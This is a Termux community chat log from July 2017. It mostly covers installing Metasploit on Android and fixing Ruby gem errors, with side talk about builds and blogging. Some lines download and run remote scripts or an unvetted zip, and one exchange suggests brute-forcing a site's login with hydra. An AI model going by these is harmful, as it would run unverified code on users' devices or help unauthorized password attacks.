2017-07-27 03:56:29 gitter (Auxilus) @vishalbiswas https://pastebin.com/JgiBsBeh
2017-07-27 03:56:33 gitter (Auxilus) Never had this error
2017-07-27 04:27:50 Auxilus .
2017-07-27 04:30:01 Auxilus @kuburan
2017-07-27 06:11:29 gitter (fornwall) @rnauber no, just haven’t done it, I’ll release it later today!
2017-07-27 06:12:38 gitter (Auxilus) What termux-boot ?
2017-07-27 07:12:50 gitter (Techzindia) Hello!!
2017-07-27 07:13:09 gitter (Auxilus) Hey man !
2017-07-27 07:13:46 gitter (Auxilus) @Techzindia you had problem with
2017-07-27 07:14:36 gitter (Auxilus) Meterpreter ri8 ?
2017-07-27 07:14:50 gitter (Auxilus) Can you tell me what ip are you using ?
2017-07-27 07:15:00 gitter (Techzindia) Solved
2017-07-27 07:15:10 gitter (Auxilus) Cool
2017-07-27 07:15:17 gitter (Hax4us) How techzindia
2017-07-27 07:15:44 gitter (Techzindia) I make a Zip for Network_interface0.0.1
2017-07-27 07:16:15 gitter (Hax4us) Bro…plz make a fresh tutorial on this ..like video….can u make….plz..dont say no…
2017-07-27 07:17:17 gitter (Techzindia) wget http://download957.mediafire.com/8u9282lyuajg/56tbcwc1jlhcrrr/TechZindia.zip
2017-07-27 07:17:39 gitter (Techzindia) Download in metasploit folder
2017-07-27 07:17:42 gitter (Techzindia) And
2017-07-27 07:17:53 gitter (Techzindia) unzip and Install
2017-07-27 07:20:07 gitter (Hax4us) Kk…try karta hu..☺
2017-07-27 07:25:55 gitter (Auxilus) Don’t unzip anything in metasploit dir
2017-07-27 07:27:29 gitter (Hax4us) But techzindia…said..well..OK..I don’t unzip
2017-07-27 07:28:36 gitter (Auxilus) Unzip outside metasploit dir
2017-07-27 07:29:42 gitter (Techzindia) @Auxilus ya…. sorry i not mention…
2017-07-27 07:34:14 gitter (Auxilus) Anyone got solution for git sources unchecked error
?
2017-07-27 07:40:22 gitter (Techzindia) No idea
2017-07-27 07:42:07 gitter (Techzindia) But Nokogiri error come … every time in my friend case..
2017-07-27 07:43:04 gitter (Hax4us) Yes i have sol…@Auxilus
2017-07-27 07:43:11 gitter (Auxilus) How
2017-07-27 07:43:45 gitter (Hax4us) edit the gemfile.locale
2017-07-27 07:43:46 gitter (Hax4us) And
2017-07-27 07:43:48 gitter (Auxilus) @Techzindia nokogiri must be installed with gem install nokogiri -- --use-system-libraries
2017-07-27 07:44:00 gitter (Hax4us) At last u
2017-07-27 07:44:50 gitter (Hax4us) will see a line like http://guthub.com/timwr/network_interface ….just clear the line
2017-07-27 07:45:07 gitter (Hax4us) Means whole…line..
2017-07-27 07:45:14 gitter (Auxilus) Which line ?
2017-07-27 07:45:26 gitter (Techzindia) @Auxilus i already try with
2017-07-27 07:45:45 gitter (Techzindia) nokogiri – –use-system-libraries
2017-07-27 07:46:00 gitter (Auxilus) gem uninstall nokogiri
then install again
2017-07-27 07:46:25 gitter (Hax4us) @Auxilus bro…wait I m sending pic
2017-07-27 07:48:29 gitter (Hax4us) Can we share pic in this app
2017-07-27 07:48:32 gitter (Hax4us) Or not
2017-07-27 07:48:43 gitter (Hax4us) Is there any option
2017-07-27 07:49:35 gitter (Auxilus) No u can’t
2017-07-27 07:49:38 gitter (Auxilus) :P
2017-07-27 07:51:05 gitter (Hax4us) Well…see…@Auxilus..u can see this line at last of gemfile.locale…just clear whole..line..from create custom group to end…….# Create a custom group
2017-07-27 07:51:05 gitter (Hax4us) group :local do
2017-07-27 07:51:05 gitter (Hax4us) gem ‘network_interface’, :git => “https://github.com/timwr/network_interface.#git”, :branch => “master”
2017-07-27 07:51:05 gitter (Hax4us) end
2017-07-27 07:51:50 gitter (Auxilus) K
2017-07-27 07:51:53 gitter (Auxilus) I’ll try
2017-07-27 07:52:43 gitter (Hax4us) I bypasses this…but still..I have not Metasploit😑😢
2017-07-27 08:04:45 gitter (Auxilus) There was a time , a time long ago , I had idea to run metasploit in termux , I asked @vishalbiswas , he instructed me , I had only two
errors , 1nokogiri
2network_interface
, I fixed it , boom, I’m hackin’ and exploiting in hood !!
2017-07-27 08:05:44 gitter (Auxilus) N grpc error , no git checked out error no segfault error !
2017-07-27 08:06:37 gitter (Hax4us) Well…I have meta in my rooted phone…but I want to run in non rooted phone….
2017-07-27 08:07:31 gitter (Hax4us) Bro @Auxilus plz make a video on this..plz bro…
2017-07-27 08:19:59 gitter (Auxilus) Well we’ll see
2017-07-27 08:27:06 gitter (Hax4us) I will wait….@Auxilus
2017-07-27 08:29:56 gitter (Auxilus) You are most welcome to do that …
2017-07-27 08:45:23 frumpylava ugh…. 90% of all errors I have when building packages are “cannot find -lncurses”
2017-07-27 08:47:59 gitter (Ashish882) Hi
2017-07-27 08:49:37 gitter (Ashish882) Tell
2017-07-27 08:50:21 frumpylava Trying to build moria. But it’s build system is ancient.
2017-07-27 08:52:02 gitter (Ashish882) How I can remove * from *ifreq in network_interface
2017-07-27 08:53:37 gitter (Hax4us) 😂bro leave….. I m gonna mad….I waste my 2gb data for this….but still have errors….I happy with my meta in rooted phone…I will wait for @Auxilus video….
2017-07-27 08:54:46 gitter (Ashish882) Bro tell me how you bypass from it
2017-07-27 09:05:31 allkhor Hi people, anyone have a problem with installing python 3.6.2 ? Can’t find any issue on github related to my problem. Termux freezes after message: Setting up pip…
2017-07-27 09:05:35 gitter (Techzindia) I install metasploit without root..no network_interface error
2017-07-27 09:06:31 gitter (Techzindia) But in some device only one error was comming “network_interface” and github check
2017-07-27 09:06:46 gitter (Techzindia) wget http://download957.mediafire.com/9yxeh3phagkg/56tbcwc1jlhcrrr/TechZindia.zip
2017-07-27 09:07:38 gitter (Techzindia) Any one Test My TechZindia.zip for fixing network_interface error
2017-07-27 09:10:36 frumpylava allkhor: Does it freeze forever? What freezes, the process or the UI of Termux?
2017-07-27 09:15:07 allkhor frumpylava: termux stoped response, ctrl+c not work.. last line Setting up pip… scroll worked.
2017-07-27 09:17:09 allkhor frumpylava: device meizu m2 mini, android 5.1. Before update python to version 3.6.2 all worked correct.
2017-07-27 09:18:57 frumpylava allkhor: Try uninstalling python and installing it again.
2017-07-27 09:23:07 allkhor frumpylava: i tried uninstall termux, and install it on another meizu m2 mini(have a 2 identical phone), not worked, but python 2 installed correct..
2017-07-27 09:25:58 frumpylava allkhor: hmm… Don’t know. You should probably open an issue on github about it.
2017-07-27 09:26:42 allkhor frumpylava: ok, thank you )
2017-07-27 10:45:29 frumpylava Anybody willing to test a build of moria? It seems to work, though I have never played it myself, so I can’t really tell.
2017-07-27 16:02:29 necklace Yo I get a “undefined reference to `getsubopt’” when trying to compile dfc on Termux.. really weird since getsubopt is in stdlib.h
2017-07-27 18:12:25 live_the_dream getsubopt(char, char* const*, char) __INTRODUCED_IN(26);
2017-07-27 18:13:27 live_the_dream we use 21 as its 5.0 devices
2017-07-27 18:14:28 live_the_dream so to use that i think you have to define ANDROID_API=26 and be on rom that supports that apo level
2017-07-27 18:14:33 live_the_dream api
2017-07-27 18:15:46 live_the_dream 23 android 6.0
2017-07-28 00:04:48 anhj hi there
2017-07-28 01:14:21 live_the_dreams is cmake on device hanging on arm for anyone else when you try to build?
2017-07-28 04:31:18 kalong )
2017-07-28 08:02:35 fornwall live_the_dreams: hm, cmake perhaps needs to be rebuilt after the arm c++ fixes
2017-07-28 08:02:47 fornwall I’ll try it out
2017-07-28 08:07:56 gitter (Auxilus) Nope
2017-07-28 08:08:18 gitter (Auxilus) Just follow network_interface installion steps on wiki
2017-07-28 08:09:14 live_the_dreams already did it was buil5
2017-07-28 08:11:22 gitter (kuburan) Yes @Ashish882 that was very powerfull tool. If you have the right wordlist.
2017-07-28 08:11:52 gitter (Ashish882) @kuburan I need help for that can you
2017-07-28 08:12:17 live_the_dreams i wonder if my hack turns out the superior solution :)
2017-07-28 08:13:00 gitter (Auxilus) And you are talking about ?
2017-07-28 08:13:06 gitter (Ashish882) I want to crack pass of my own site http://knighthood.ml/hack/
2017-07-28 08:13:17 gitter (Ashish882) Testing purpose
2017-07-28 08:13:37 gitter (Ashish882) But I don’t know to to crack
2017-07-28 08:14:06 gitter (Ashish882) Because it need temper data
2017-07-28 08:14:14 live_the_dreams password stuff is either fast of very slow….
2017-07-28 08:14:14 live_the_dreams or
2017-07-28 08:15:25 gitter (Auxilus) You can use tools like hydra
2017-07-28 08:17:20 live_the_dreams also fornwall ndk 15c .. is available
2017-07-28 08:18:36 gitter (Ashish882) Yes but what I put in failed login
2017-07-28 08:19:22 gitter (Auxilus) WTH
2017-07-28 08:19:22 gitter (Auxilus)
2017-07-28 08:19:38 gitter (Auxilus) You just filtered all ports
2017-07-28 08:19:49 gitter (Auxilus) I was about to perform brute Force
2017-07-28 08:20:44 gitter (Ashish882) Tell me blow with command
2017-07-28 08:35:36 gitter (suryapoo) Auxi!!!
2017-07-28 08:35:37 gitter (suryapoo) I’m on WiFi man
2017-07-28 08:35:52 gitter (suryapoo) How to install MSF on termux
2017-07-28 08:38:06 gitter (Auxilus) Here cd $HOME && wget https://Auxilus.github.io/metasploit.sh && chmod 777 metasploit.sh && termux-fix-shebang metasploit.sh && ./metasploit.sh
2017-07-28 08:38:41 gitter (suryapoo) Dude what’s $HOME
2017-07-28 08:39:19 gitter (Auxilus) Home for
2017-07-28 08:39:19 gitter (Auxilus)
2017-07-28 08:39:23 gitter (Auxilus) *dir
2017-07-28 08:40:09 gitter (suryapoo) Is it like this 1) $HOME 2)wget 3)chmod 777 4) termux-fix-shebang… 5)./metasploit.sh
2017-07-28 08:40:40 live_the_dreams there is no place like home $HOME ~
2017-07-28 08:40:50 gitter (Auxilus) 1) CD $HOME
2017-07-28 08:41:05 gitter (Auxilus) NOT CD cd
2017-07-28 08:41:06 gitter (Auxilus) Then wget
2017-07-28 08:41:13 gitter (suryapoo) Okk
2017-07-28 08:41:17 gitter (suryapoo) Let’s try
2017-07-28 08:41:46 live_the_dreams haha
2017-07-28 08:42:03 gitter (Auxilus) then chmod the metasploit.sh
2017-07-28 08:42:06 gitter (Auxilus) Then execute
2017-07-28 08:42:18 gitter (suryapoo) wget: not an http or ftp url: https://Auxilus.github.io/metasploit.sh
2017-07-28 08:42:26 gitter (suryapoo) This is what I got
2017-07-28 08:42:46 gitter (Auxilus) apt install wget
2017-07-28 08:43:18 gitter (Auxilus) Then wget
2017-07-28 08:43:49 gitter (suryapoo) Alright
2017-07-28 08:44:20 gitter (Auxilus) Works ?
2017-07-28 08:44:52 gitter (suryapoo) Nope
2017-07-28 08:44:53 gitter (suryapoo) What am I doing wrong
2017-07-28 08:45:13 gitter (Auxilus) You did apt install wget ?
2017-07-28 08:46:20 gitter (suryapoo) Yea
2017-07-28 08:46:37 gitter (suryapoo) Den also ..the same error
2017-07-28 08:46:43 gitter (Auxilus) Do `wget https://Auxilus.github
2017-07-28 08:46:59 gitter (Auxilus) .ik/metasploit.sh`
2017-07-28 08:49:12 gitter (suryapoo) wget https://Auxilus.github.ik/metasploit.sh
2017-07-28 08:49:12 gitter (suryapoo) wget: not an http or ftp url: https://Auxilus.github.ik/metasploit.sh
2017-07-28 08:49:54 gitter (Auxilus) Wait…
2017-07-28 08:54:34 gitter (Auxilus) Wait man
2017-07-28 08:55:36 gitter (suryapoo) Yea…
2017-07-28 08:56:08 gitter (Auxilus) Wait bro
2017-07-28 09:03:44 gitter (Auxilus) localhost : wget https://Auxilus.github.io/metasploit.sh
2017-07-28 09:03:44 gitter (Auxilus) –2017-07-28 18:33:20– https://auxilus.github.io/metasploit.sh
2017-07-28 09:03:44 gitter (Auxilus) Resolving auxilus.github.io… 151.101.113.147, 2a04:4e42:1b::403
2017-07-28 09:03:44 gitter (Auxilus) [full message: https://gitter.im/termux/termux?at=597b3630614889d475fa9929]
2017-07-28 09:03:48 gitter (Auxilus) Works for me
2017-07-28 09:03:55 gitter (Auxilus) Link is good
2017-07-28 09:05:10 gitter (Auxilus) @suryapoo can you execute ` curl -LO https://Auxilus.github.io/metasploit.sh` ?
2017-07-28 09:08:41 gitter (suryapoo) @Auxilus ch packages: pkg search
2017-07-28 09:08:41 gitter (suryapoo) $ curl -LO https://Auxilus.github.io/metasploit.sh
2017-07-28 09:08:41 gitter (suryapoo) % Total % Received % Xferd Average Speed Time Time Time Current
2017-07-28 09:08:41 gitter (suryapoo) [full message: https://gitter.im/termux/termux?at=597b375876a757f808547db9]
2017-07-28 09:09:13 gitter (Auxilus) Now ls
2017-07-28 09:09:21 gitter (Auxilus) Is there metasploit.sh file ?
2017-07-28 09:10:20 gitter (suryapoo) Yes!!!!!!
2017-07-28 09:10:26 gitter (suryapoo) But it was quick
2017-07-28 09:10:32 gitter (Auxilus) Lol
2017-07-28 09:10:48 gitter (Auxilus) Script is lil in size
2017-07-28 09:10:48 gitter (Auxilus) Now chmod 777 metasploit.sh
2017-07-28 09:11:01 gitter (Auxilus) Are you in ./?
2017-07-28 09:11:26 gitter (Auxilus) Are you in home dir ?
2017-07-28 09:12:13 gitter (suryapoo) Home
2017-07-28 09:12:29 gitter (Auxilus) Done chmod ?
2017-07-28 09:12:38 gitter (suryapoo) Done
2017-07-28 09:12:47 gitter (suryapoo) chmod 777 metasploit.sh
2017-07-28 09:12:49 gitter (suryapoo) Done
2017-07-28 09:13:10 gitter (Auxilus) Now ./metasploit.sh
2017-07-28 09:15:41 gitter (suryapoo) Its downloading from termux. sources
2017-07-28 09:16:09 gitter (suryapoo) Omg I’m about to cry when I see MSF > :smile:
2017-07-28 09:16:21 gitter (Auxilus) Ye , it’s installing all requirements
2017-07-28 09:16:29 gitter (Auxilus) It will take a lil longer
2017-07-28 09:16:36 gitter (Auxilus) Don’t cancel it till it’s done
2017-07-28 09:20:57 gitter (Auxilus) @al3xv3gas is it done ?
2017-07-28 09:21:09 gitter (suryapoo) Yuppppppppppppppppp
2017-07-28 09:21:09 gitter (Auxilus) Cool
2017-07-28 09:21:19 gitter (Auxilus) ./msfconsole working ?
2017-07-28 09:21:58 gitter (Auxilus) ?
2017-07-28 09:23:07 gitter (suryapoo) Its downloading requirements
2017-07-28 09:23:17 gitter (Auxilus) K
2017-07-28 09:23:30 gitter (suryapoo) BTW..is termux a complete Linux bash shell?
2017-07-28 09:23:39 gitter (suryapoo) Means I can learn bash on termux?
2017-07-28 09:23:43 gitter (Auxilus) Sure
2017-07-28 09:24:09 gitter (suryapoo) Gr8888!!
2017-07-28 09:24:32 gitter (suryapoo) Thank god I came on bitter
2017-07-28 09:24:37 gitter (suryapoo) Gitter*
2017-07-28 09:24:41 gitter (suryapoo) Bloody keyboard
2017-07-28 09:24:53 gitter (Auxilus) When it’s done it’ll say metasploit installed
2017-07-28 09:27:20 gitter (suryapoo) Waiting for that …….
2017-07-28 09:27:42 gitter (suryapoo) BTW ..I had made a Python module ..called blackhat..
2017-07-28 09:28:07 gitter (Auxilus) And it does ?
2017-07-28 09:28:20 gitter (suryapoo) Which if u run on a machine.. It will make unlimited directories ..till it covers up all the space
2017-07-28 09:28:50 gitter (suryapoo) Made that while was bathing.. Stupidity :D
2017-07-28 09:29:14 gitter (Auxilus) :p
2017-07-28 09:29:28 gitter (Auxilus) I made same script using batch file program
2017-07-28 09:30:04 gitter (suryapoo) Niceeeeeeeeeeee
2017-07-28 09:30:16 gitter (suryapoo) I want to learn bash from u Linux pros
2017-07-28 09:30:32 gitter (suryapoo) U all like crazy programmers.. In a good way
2017-07-28 09:30:58 gitter (Auxilus) M not a pro :package: you haven’t seen @vishalbiswas @fornwall work yet
2017-07-28 09:32:31 live_the_dreams im insulted
2017-07-28 09:32:45 gitter (Auxilus) :p
2017-07-28 09:32:51 gitter (Auxilus) I can’t @ you
2017-07-28 09:32:58 gitter (suryapoo) Fornwall made termux….says it all
2017-07-28 09:33:00 gitter (Auxilus) You are on IRC
2017-07-28 09:33:01 gitter (Auxilus)
2017-07-28 09:33:16 gitter (suryapoo) Vishal is a goddamn pro…I have seen u guys on github
2017-07-28 09:33:18 gitter (Auxilus) Ye but live is one of main men
2017-07-28 09:33:42 gitter (suryapoo) I want to be like u guys man
2017-07-28 09:34:06 gitter (suryapoo) A stupid commerce student with an interest in programming.. What a mismatch!!
2017-07-28 09:35:11 gitter (Auxilus) You can develop software s like tally with yo skill s , companies will definitely hire you
2017-07-28 09:36:41 gitter (suryapoo) Auxi..got an error on network interface
2017-07-28 09:37:17 gitter (suryapoo) installing Network_interface
2017-07-28 09:37:17 gitter (suryapoo) ERROR: Gem ‘etwork_interface’ not installed nor fetchable.
2017-07-28 09:37:17 gitter (suryapoo) ./metasploit.sh: 26: cd: can’t cd to network_interface-0.0.1
2017-07-28 09:37:17 gitter (suryapoo) [full message: https://gitter.im/termux/termux?at=597b3e0cbc464729743286b4]
2017-07-28 09:37:42 gitter (Auxilus) Else done ?
2017-07-28 09:38:20 gitter (suryapoo) The batch file stopped I guess
2017-07-28 09:38:23 gitter (suryapoo) No ‘$’
2017-07-28 09:38:45 gitter (suryapoo) No..its going on ..wait
2017-07-28 09:41:56 gitter (Auxilus) You might have already insta
2017-07-28 09:41:56 gitter (Auxilus) Network interfere
2017-07-28 09:44:44 gitter (Auxilus) @suryapoo done ?
2017-07-28 09:44:59 gitter (suryapoo) Its doing it’s thing
2017-07-28 09:45:24 gitter (suryapoo) Fetching various ruby gems..I just saw metasploit payload … :)
2017-07-28 09:45:38 gitter (Auxilus) Nice…
2017-07-28 09:48:18 gitter (suryapoo) Performing shebang fix
2017-07-28 09:48:19 gitter (suryapoo) What’s that
2017-07-28 09:49:06 gitter (suryapoo) ./msfconsole
2017-07-28 09:49:06 gitter (suryapoo) bash: ./msfconsole: No such file or directory
2017-07-28 09:50:22 gitter (Auxilus) cd in metasploit dir
2017-07-28 09:51:49 gitter (Auxilus) @suryapoo
2017-07-28 09:58:34 gitter (suryapoo) Okiiiii
2017-07-28 09:58:53 gitter (Auxilus) Or do this
2017-07-28 09:59:00 gitter (Auxilus) Edit metasploit.sh
2017-07-28 09:59:07 gitter (Auxilus) Remove –depth 1
2017-07-28 09:59:17 gitter (suryapoo) And?
2017-07-28 09:59:26 gitter (Auxilus) And save
2017-07-28 09:59:32 gitter (Auxilus) Then ./metasploit.sh
2017-07-28 09:59:49 gitter (Auxilus) Before that emoji metasploit-framework -rf
2017-07-28 09:59:56 gitter (Auxilus) The old 1
2017-07-28 10:00:11 gitter (suryapoo) OK
2017-07-28 10:00:21 gitter (suryapoo) So remove the metasploit-framework dir
2017-07-28 10:00:29 gitter (suryapoo) And edit the metasploit. sh
2017-07-28 10:00:38 gitter (Auxilus) Then run again
2017-07-28 10:01:27 gitter (suryapoo) Okiii
2017-07-28 10:01:34 gitter (suryapoo) Where is –depth 1?
2017-07-28 10:02:05 gitter (Auxilus) It installs latest release
2017-07-28 10:05:24 gitter (suryapoo) Cloning——–
2017-07-28 10:05:57 gitter (Auxilus) K
2017-07-28 10:06:38 gitter (suryapoo) Which programming language should i learn to get a job ?
2017-07-28 10:06:46 gitter (suryapoo) Pls dont say java.
2017-07-28 10:06:54 gitter (suryapoo) im an amateur
2017-07-28 10:07:27 gitter (Auxilus) Language is matter of what the problem is
2017-07-28 10:07:44 gitter (Auxilus) Lol , event I can’t code in Java
2017-07-28 10:07:44 gitter (Auxilus)
2017-07-28 10:09:38 gitter (suryapoo) I loved python..but hold it for now
2017-07-28 10:09:44 gitter (suryapoo) Now leanring JS
2017-07-28 10:09:47 gitter (suryapoo) Nodejs
2017-07-28 10:10:10 gitter (suryapoo) But im not sure if i can get a job on that
2017-07-28 10:14:34 gitter (Ashish882) Hi
2017-07-28 10:14:59 gitter (ackalker) Random tip (haven’t seen it documented anywhere):
2017-07-28 10:15:00 gitter (ackalker)
2017-07-28 10:15:00 gitter (ackalker) To make Termux’ build cache directory accessible from outside of the Docker container (to ease patching and/or developing packages which require messing with the source files directly):
2017-07-28 10:15:00 gitter (ackalker) [full message: https://gitter.im/termux/termux?at=597b46e3a7b406262d3b69b8]
2017-07-28 10:15:50 gitter (suryapoo) Oooioooo
2017-07-28 10:19:08 gitter (Auxilus) @suryapoo it works ?
2017-07-28 10:21:12 gitter (suryapoo) Its installing gems
2017-07-28 10:21:24 gitter (suryapoo) 5 mins more i guess.
2017-07-28 10:21:47 gitter (Auxilus) Okay ,
2017-07-28 10:21:58 gitter (Auxilus) It gave any error till now ?
2017-07-28 10:22:09 gitter (suryapoo) Network interface
2017-07-28 10:23:04 gitter (Auxilus) We will install it manually then
2017-07-28 10:23:39 gitter (suryapoo) Yea…
2017-07-28 10:24:06 gitter (suryapoo) cmon metasploit…i have waited for u for such a long time
2017-07-28 10:24:16 gitter (suryapoo) I was on nethunter (kali)
2017-07-28 10:24:31 gitter (suryapoo) Good experience
2017-07-28 10:24:31 gitter (Auxilus) Here , open new console and put gem list|grep network
2017-07-28 10:24:56 benl90 I have question,is there anyway to make ubuntu repo works on termux? thanks
2017-07-28 10:25:33 frumpylava benl90: no
2017-07-28 10:26:02 frumpylava The file structure of termux is very different than ubuntu
2017-07-28 10:26:03 benl90 frumpylava: so in the end I need the termux repo in order to make termux work as it is?
2017-07-28 10:26:57 frumpylava benl90: yes. Otherwise you’d have to compile all the software yourself.
2017-07-28 10:27:32 benl90 frumpylava: with gcc or such?
2017-07-28 10:27:47 frumpylava clang. Termux doesn’t have gcc.
2017-07-28 10:28:05 benl90 technically when I have C compiler then I could build anything?
2017-07-28 10:28:25 benl90 frumpylava: Yeah clang,but I execute it using g++ and gcc
2017-07-28 10:28:34 benl90 is that diffrent?
2017-07-28 10:29:22 frumpylava well yeah. with a c compiler you can compile almost anything. You’d just have to patch it for Android/Termux.
2017-07-28 10:29:54 gitter (suryapoo) Could not find activesupport-4.2.9 in any of the sources
2017-07-28 10:29:54 gitter (suryapoo) Run bundle install
to install missing gems.
2017-07-28 10:29:54 gitter (suryapoo) $
2017-07-28 10:29:54 gitter (suryapoo) :((((((
2017-07-28 10:30:54 benl90 frumpylava: does termux repo done much porting to android before deploy the program?
2017-07-28 10:31:11 gitter (kuburan) Guys network interface should be patching manually, thats not enought to run metasploit.sh it self
2017-07-28 10:31:31 gitter (Auxilus) Run gem active support -v 4.2.9
2017-07-28 10:31:52 frumpylava benl90: Yes. most software in the repo is patched for termux in some way. only a few work with no patches at all.
2017-07-28 10:32:37 benl90 frumpylava: okay then.thanks.
2017-07-28 10:32:54 benl90 well will you answer OOT question?
2017-07-28 10:33:17 frumpylava what question?
2017-07-28 10:33:50 benl90 frumpylava: do you code on android?
2017-07-28 10:34:56 frumpylava benl90: yes.
2017-07-28 10:35:53 gitter (suryapoo) @Auxilus gem active support -v 4.2.9
2017-07-28 10:35:53 gitter (suryapoo) ERROR: While executing gem … (Gem::CommandLineError)
2017-07-28 10:35:53 gitter (suryapoo) Unknown command active
2017-07-28 10:37:34 benl90 frumpylava: what kind of language? phone or tablet?
2017-07-28 10:39:25 frumpylava benl90: python, php, bash. Phone, but I connect to it via ssh.
2017-07-28 10:40:38 gitter (Auxilus) Bro no space
2017-07-28 10:40:55 benl90 frumpylava: so you only use the phone as ssh client not a full powered machine?
2017-07-28 10:41:06 gitter (Auxilus) In activesupport
2017-07-28 10:42:12 gitter (suryapoo) So now??
2017-07-28 10:42:36 frumpylava benl90: no. I connext from my laptop to termux. Termux runs an ssh server
2017-07-28 10:43:45 gitter (Auxilus) @suryapoo is it installed ?
2017-07-28 10:43:57 gitter (suryapoo) @Auxilus what bro?
2017-07-28 10:44:09 gitter (Auxilus) Activesupport
2017-07-28 10:44:16 gitter (suryapoo) How to check
2017-07-28 10:45:31 gitter (suryapoo) Its showing unknown command
2017-07-28 10:45:56 gitter (suryapoo) Installed
2017-07-28 10:47:13 benl90 frumpylava: holy, oh God. so the main development machine is your phone?
2017-07-28 10:47:14 gitter (Auxilus) ` list`
2017-07-28 10:47:19 gitter (Auxilus) gem list
2017-07-28 10:47:50 gitter (Auxilus) Is there activesupport in the list ?
2017-07-28 10:48:30 gitter (suryapoo) Yes
2017-07-28 10:48:37 benl90 I see.that’s my rethorical question. that’s awesome anyway.
2017-07-28 10:48:59 gitter (suryapoo) @Auxilus Could not find rails-deprecated_sanitizer-1.0.3 in any of the sources
2017-07-28 10:48:59 gitter (suryapoo) Run bundle install
to install missing gems.
2017-07-28 10:48:59 gitter (suryapoo) $ bundle install
2017-07-28 10:48:59 gitter (suryapoo) [full message: https://gitter.im/termux/termux?at=597b4eda2723db8d5e55202e]
2017-07-28 10:50:13 frumpylava benl90: yes. I even did a talk about that recently. Here’s the video, but it isn’t subtitled yet: https://media.ccc.de/v/zeteco-59-termux_als_betriebssystem
2017-07-28 10:55:27 benl90 ah okay, I’ll see it. I just wanted my fonepad 8 to replace my main machine. I use ksweb here on android to develop php and mailer and such. Ah.. a little bit wsting of money on it.
2017-07-28 10:56:04 benl90 but I working too long on windows env that cause me hard to move on android as main development machine. It sucks some time
2017-07-28 10:57:06 sdrausty frumpylava: Once you translate your subtitles into English I will be glad to review it. I used to be an English Teacher.
2017-07-28 10:58:25 benl90 ah I also wan that one. I want to write some of the review on my blog site.
2017-07-28 10:59:04 frumpylava sdrausty: that’s cool. First I need to figure out how to actually subtitle a video.
2017-07-28 11:00:09 sdrausty frumpylava: search ffmpeg add subtitles to mp4
2017-07-28 11:01:10 sdrausty You be able to do this on device.
2017-07-28 11:01:57 sdrausty *should be able to
2017-07-28 11:03:17 sdrausty https://stackoverflow.com/questions/8672809/use-ffmpeg-to-add-text-subtitles
2017-07-28 11:04:24 gitter (suryapoo) @Auxilus Fetching gem metadata from https://rubygems.org/.
2017-07-28 11:04:24 gitter (suryapoo) Retrying fetcher due to error (2/4): IOError uninitialized stream.Segmentation fault
2017-07-28 11:04:24 gitter (suryapoo) $
2017-07-28 11:04:37 gitter (suryapoo) Bundle install -j5 gives the above error
2017-07-28 11:05:05 gitter (Auxilus) WTH you are getting segfault ??
2017-07-28 11:05:08 gitter (Auxilus) Are u in root ?
2017-07-28 11:06:16 gitter (Auxilus) @suryapoo you better upload error screenshot on the issue
2017-07-28 11:08:26 sdrausty benl90: What’s the address to your blog?
2017-07-28 11:10:52 benl90 tahutek.net
2017-07-28 11:11:45 benl90 old Indonesian blog dedicated for open source news. but now many of the writer are working on code so the blog never updated even have a wide range of follower and reader.
2017-07-28 11:12:22 benl90 I’m busy pursuing my degree in Information System, and also work on university lab too much -_-
2017-07-28 11:14:52 gitter (Auxilus) Which keyboard is this ?https://m.imgur.com/a/3c06b
2017-07-28 11:19:44 gitter (suryapoo) @Auxilus ..OK..how do I do that
2017-07-28 11:21:12 sdrausty benl90: Thanks for the link; Nice blog. Let’s leave the age of whirling fans and disks behind just like we left the stone and bronze ages behind us! It would be nice to read about Termux on your blog.
2017-07-28 11:24:42 sdrausty Linux in your pocket = Termux
2017-07-28 11:26:11 sdrausty Linux di saku = Termux
2017-07-28 11:26:33 sdrausty Linux в вашем кармане = Termux
2017-07-28 11:26:52 sdrausty Linux in deiner Tasche = Termux
2017-07-28 11:27:24 sdrausty Linux i fickan = Termux
2017-07-28 11:27:55 sdrausty Linux en tu bolsillo = Termux
2017-07-28 11:28:18 sdrausty Linux dans votre poche = Termux
2017-07-28 11:29:28 gitter (Techzindia) @Auxilus Please re write metasploit.sh Problem while installing network_interface because you write
2017-07-28 11:29:49 gitter (Techzindia) gem unpack etwork_interface
2017-07-28 11:29:58 gitter (Techzindia) So change That
2017-07-28 11:31:19 sdrausty 주머니 속의 리눅스 = Termux
2017-07-28 11:31:51 sdrausty 你的口袋里的Linux = Termux
2017-07-28 11:33:29 gitter (vishalbiswas) @Auxilus @Techzindia is correct
2017-07-28 11:33:36 gitter (Auxilus) @Techzindia thank you very much
2017-07-28 11:34:11 gitter (Auxilus) @vishalbiswas
2017-07-28 11:34:21 gitter (Auxilus) @suryapoo is having segfault error
2017-07-28 11:35:15 gitter (Auxilus) @Techzindia script is corrected now
2017-07-28 11:35:45 sdrausty لينكس في جيبك = Termux
2017-07-28 11:35:54 gitter (Techzindia) @suryapoo segfault error?? @Auxilus
2017-07-28 11:36:04 gitter (vishalbiswas) @suryapoo do you have enough space? don’t try to run this script on sdcard
2017-07-28 11:36:14 gitter (vishalbiswas) run it in your home directory
2017-07-28 11:36:45 gitter (Auxilus) I ran it bunch of times , but it must be tried on fresh device
2017-07-28 11:37:32 gitter (Techzindia) @Auxilus can i use your script for installation tutorial for My YouTube Channel please…
2017-07-28 11:37:58 gitter (Auxilus) Man , hax4us already did that on his channel
2017-07-28 11:38:05 gitter (Techzindia) Because 60% error while install nokogiri gem
2017-07-28 11:38:13 gitter (Auxilus) Ye you can use my script
2017-07-28 11:38:32 gitter (Techzindia) @Auxilus Thenk You So much.. ;)
2017-07-28 11:38:49 gitter (Auxilus) Just don’t say that you created the script , and it’s ok if you don’t mention me :p
2017-07-28 11:39:17 sdrausty vishalbiswas: Thank you for your advice on submodules. https://github.com/sdrausty/buildAPKs uses submodules as of a few days ago. Any future advice about developing this repository is welcome.
2017-07-28 11:39:48 gitter (Auxilus) @Techzindia you got nokogiri error with my script ?
2017-07-28 11:40:13 gitter (vishalbiswas) sdrausty: I am looking for maven repos
2017-07-28 11:40:14 sdrausty It builds more than 400 APKs at present on device.
2017-07-28 11:40:19 gitter (vishalbiswas) that’s the major blocker
2017-07-28 11:40:42 gitter (vishalbiswas) did you try building any other app relying on Android Support Library
2017-07-28 11:41:05 gitter (Auxilus) We can build app apks on Termux ?
2017-07-28 11:41:12 gitter (Auxilus) Also what’s termux-boot ?
2017-07-28 11:41:15 sdrausty How to download and link libraries is still a hurdle to overcome.
2017-07-28 11:42:50 sdrausty termux-boot does not build on device with buildAPKs. termux-app builds an APK on device, but not the main app.
2017-07-28 11:43:45 gitter (vishalbiswas) @themastersunil try running apt install -f
